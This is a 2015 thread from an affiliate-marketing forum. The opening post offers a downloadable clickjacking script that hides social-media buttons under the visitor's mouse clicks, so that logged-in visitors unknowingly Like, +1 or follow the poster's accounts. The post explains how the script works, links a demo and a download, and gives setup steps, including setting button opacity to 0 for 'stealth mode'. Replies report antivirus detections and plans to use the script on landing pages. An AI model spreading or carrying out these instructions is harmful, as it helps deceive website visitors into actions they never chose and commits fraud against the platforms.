[New Method] ClickJacking On Facebook, Twitter and Google Plus > Working 2015 !
2015-01-21, 12:45 AM,
#1
Hey guys,

After hearing some news that clickjacking is patched by facebook and others, I made an extensive search and i found this code as a way to show how you might hide an embedded object into a website in order to execute a successful ClickJacking attack. This code will maliciously force the user, or the visitor, to Silently ‘Like’ or +1 a particular page on Facebook or Google+, or add twitter followers.

How the Code Works:

1. User visits the page -> jQuery script is executed
The script detects which social media sites the user is logged into (Facebook, Twitter, or Google+)
2. If the script detects a login from any of those sites, it will iterate down the list and pick the first of the logged in sites (for this example, let’s use Facebook)
3. Using HTML, CSS, and Javascript/jQuery, a hidden button will be loaded and tied to the user’s mouse click event
4. When the mouse is clicked, the button will trigger and execute a particular function tied to Facebook, Twitter, or Google. In this case, the button is a ‘Like’, and the user has unknowingly liked a page on Facebook.
5. The script then unloads, and drops a cookie indicating the the Facebook script has been run
6. If the script has been placed in a website’s header, it will reload the next time the user visits a different page on the site. This time the script will detect the clickjack’s ‘Facebook complete’ cookie and automatically iterate to the next logged in service.


Live DEMOOO:

http://www.nightlionsecurity.com/scripts/cj/

Download Link:
[hide]
http://www42.zippyshare.com/v/Kyb4l33B/file.html

VirusTotal Scan Results:
https://www.virustotal.com/en/file/8c389...421774366/

Loool .. it is detected by Avast as ClickJack. a malware is in Exe,bat form. So Don't worry, the zip contains only HTML and JS files!
[/hide]

Using the Code

1. Each of the social network functions have specific opacity settings. These are currently set to VISIBLE (1). If you would like to go into stealth mode and hide the buttons, change all the ‘opacity’ settings to 0 (I will eventually make this a global option).
2. You must specific your account in the parameters of each of the social networks. Replace all instances of “[YOURNAME]” with your account name.
3. Execution of the Facebook code requires a Facebook APP ID. The app ID you are using must have the same domain name as the script. This code is located in index.html
4. The login status messages can be safely removed form the HTML file without effecting the rest of the code.
Reply
Share This Thread :

2015-01-21, 05:02 AM,
#2
This works for twitter? I tried your example, but its not detecting my twitter as logged in .

[Image: 0dfmTN8.png]
Reply
2015-01-21, 08:58 AM,
#3
My antivirus detects the demo site as a virus lol ...


Goals

Earn $5 Daily [ ]
Earn $10 Daily [ ]
Earn $15 Daily [ ]

Earned so far $1550+
Reply
2015-01-21, 09:48 AM,
#4
thanks.. i will try it for my LP
Reply
2015-01-21, 10:13 AM,
#5
yes this is working I've seen this also on ther forum lately..
Reply
2015-01-21, 10:19 AM,
#6
The demo is detected of my anti virus mate.

"In late repentance."

-xchanmolx
Reply
2015-01-21, 12:04 PM,
#7
I'm not sure why it is detected on your part but I scanned the test page for you guys..

https://www. virustotal. com/en/url/e1882d7195128f891fc86b38a8a24eaff8b3c5cab24d86429fc9117df5d967c4/analysis/1421818285/

(Please remove the space on the link)
Reply
2015-01-21, 12:11 PM,
#8
LOL this is sick, you can literally build a targeted fan page in no time with the right traffic, thank you very much


Reply
2015-01-21, 12:44 PM,
#9
what file should i upload to hosting?
Reply
2015-01-21, 01:13 PM,
#10
Same here. Live Demo is Detected as Virus. :D
Reply


Related Threads
Thread Author Replies Views Last Post
  [METHOD] How To Make Money by Selling Your OWN Digital Product - Quick & Smart Sami252 3 253 10 hours ago
Last Post: Samarbete
  [FRESH] [METHOD] FREE Private Dedicated IP Proxy [UNMETERED] [HOT] HexaTech 41 14,581 11 hours ago
Last Post: CPATracker
  [NEW METHOD]Easy 50$/day from facebook sczumedia 11 918 Yesterday, 01:05 AM
Last Post: sczumedia
  [UNIQUE METHOD] How to Exploit Reddit to Promote Your CPA Offers (UNSATURATED) Padfoot 67 12,438 2018-07-16, 08:11 PM
Last Post: urangi
  RIP Unlist Method - Alternative Methods (Tutorial) :) alexparris 70 9,190 2018-07-13, 01:23 PM
Last Post: Tyrone





About Us | Contact Us | CPA Elites | Advertise | Stats

© 2013-2018 CPA Elites Ltd
Enhanced by MyBB and WallBB
Return to top